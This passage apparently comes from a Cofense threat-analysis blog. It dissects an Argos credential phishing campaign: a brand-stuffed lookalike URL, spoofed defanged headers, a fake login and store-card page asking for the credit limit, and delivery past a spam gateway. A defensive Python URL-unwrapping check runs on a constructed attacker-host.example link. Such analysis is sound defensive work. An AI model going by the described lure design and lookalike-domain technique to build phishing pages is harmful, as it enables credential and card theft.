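Two things an analyst does with the link above: unwrap the click-time wrapper to get the real destination, and decide which registrable domain actually owns a host whose labels are stuffed with the brand’s name. The added example below (not Cofense’s code and not part of the original post) does both. The wrapped URL is a constructed lookalike of the one in Fig. 2, with attacker-host.example standing in for the real host, and the suffix table and brand list are minimal assumptions rather than a full public suffix list.

```python
from urllib.parse import urlparse, parse_qs

# Click-time wrappers that carry the destination in a query parameter.
# Only the pattern visible in Fig. 2 is listed; other products encode differently.
WRAPPERS = {"clicktime.symantec.com": "u"}
# Minimal suffix table for the demo; use the public suffix list in practice.
# "example" is the reserved TLD used by the constructed sample.
SUFFIXES = {"co.uk", "org.uk", "com", "net", "org", "example"}
# Brand keyword -> the registrable domain that legitimately owns it.
BRANDS = {"argos": "argos.co.uk"}

# Constructed lookalike of the wrapped link in Fig. 2.
WRAPPED = ("https://clicktime.symantec.com/EXAMPLETOKEN?u="
           "https://www.argos.co.uk.theninja.attacker-host.example"
           "/www.argos.co.uk/account-login/")
LEGIT = "https://www.argos.co.uk/account-login/"


def unwrap(url, max_hops=5):
    """Follow click-time wrappers until a non-wrapper host is reached."""
    hops = [url]
    for _ in range(max_hops):
        u = urlparse(url)
        param = WRAPPERS.get((u.hostname or "").lower())
        target = parse_qs(u.query).get(param) if param else None
        if not target:
            break
        url = target[0]
        hops.append(url)
    return url, hops


def registrable_domain(host):
    """Registrable domain = public suffix plus one label (longest suffix wins)."""
    labels = host.lower().split(".")
    for n in (2, 1):
        if ".".join(labels[-n:]) in SUFFIXES and len(labels) > n:
            return ".".join(labels[-(n + 1):])
    return host.lower()


def brand_check(url):
    """Unwrap, then report any brand that appears in the host or path of a
    URL whose registrable domain is not the brand's own."""
    final, hops = unwrap(url)
    u = urlparse(final)
    host = (u.hostname or "").lower()
    reg = registrable_domain(host)
    findings = [
        f"'{brand}' in host/path but registrable domain is {reg}"
        for brand, legit in BRANDS.items()
        if (brand in host or brand in u.path.lower()) and reg != legit
    ]
    return {"final": final, "hops": len(hops) - 1,
            "registrable": reg, "findings": findings}
```

Everything left of the registrable domain is under the attacker’s control, which is why “www.argos.co.uk” appearing twice in the link proves nothing; only the two labels before the public suffix identify the owner.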

 

Email Headers:

Analysis of the headers indicates that the “from” address is spoofed; the “reply to” field contains the address ‘no-reply[@]creativenepal[.]org’, which does not match ‘no-replays[@]multitravel.wisata-islam[.]com’.

Research on the ‘multitravel.wisata-islam’ domain failed to produce relevant data and reinforces the suspicion that the address is spoofed. At the time of analysis, we were unable to resolve an IP address, or load the domain.

From: <no-replays[@]multitravel[.]wisata-islam[.]com>
To: <xxxx.xxxxxx@xxxxxx.com>
Subject: [WARNING SUSPECTED SPAM]  [WARNING SUSPECTED SPAM]  Please make sure
 you complete the form correctly.
Thread-Topic: [WARNING SUSPECTED SPAM]  [WARNING SUSPECTED SPAM]  Please make
 sure you complete the form correctly.
Thread-Index: AQHVIXUk7CjiCOKjHEyntcvh4etMFg==
Date: Wed, 12 Jun 2019 23:18:17 +0000
Message-ID: <7d885f411da93272271ec8ad32e5064b@localhost.localdomain>
Reply-To: <“:no-reply”[@]creativenepal[.]org>

Fig 3. Email Headers

Phishing Page:

Once the user clicks on the “Sign into your account” hyperlink, they are redirected to a convincing imitation of the true Argos login page requesting the victims’ Username and Password.

This then leads the user to a second page, where the user is requested to supply details for their Argos store credit card account. This page follows the standard format for regular credit/debit cards with one key difference: the additional request for a ‘Card Amount’. This request is specific to the Argos Card as referenced in the copy: “The Argos Card lets you shop at Argos, with flexible payment plans that give you longer to pay” (see: https://www.argos.co.uk/help/argos-card/apply). This deviates from standard forms by asking the user for their credit limit.

 

 

Fig 4. Phishing Page

Gateway Evasion:

This campaign has been observed to pass through the ‘Symantec Messaging Gateway’.

The email gateway’s influence is visible: it tagged the subject line with ‘[WARNING SUSPECTED SPAM]’ but treated the message as unwanted marketing rather than phishing and delivered it to the inbox.

Conclusion:

To help protect against this type of credential phish, Cofense PhishMe™ offers a template called “Account Limitation.”

This credential phish eluded gateways and was actually mis-identified as harmless marketing spam. In fact 75% of threats reported to the Cofense Phishing Defense Center are Credential Phish. Protect the keys to your kingdom – condition end users to be resilient to Credential Harvesting attacks with Cofense PhishMe.

 


[i] Google search: “Argos Data Breach 2018”

Houdini Worm Transformed in New Phishing Attack

By Nick Guarino and Aaron Riley

The Cofense Phishing Defense Center™ (PDC)  and Cofense Intelligence have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files. This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing. Figure 1 shows an example message from this campaign.

The Zombie Phish Is Back with a Vengeance

Keep a close eye on your inboxes—the Zombie Phish is back and it’s hitting hard.

Last October, on the eve of Halloween, the CofenseTM Phishing Defense CenterTM reported on a new phishing threat dubbed the Zombie Phish. This phish spreads much like a traditional worm. Once a mailbox’s credentials have been compromised, the bot replies to long-dead emails (hence, Zombie) in the inbox of the infected account, sending a generic phishing email intended to harvest more victims for the Zombie horde.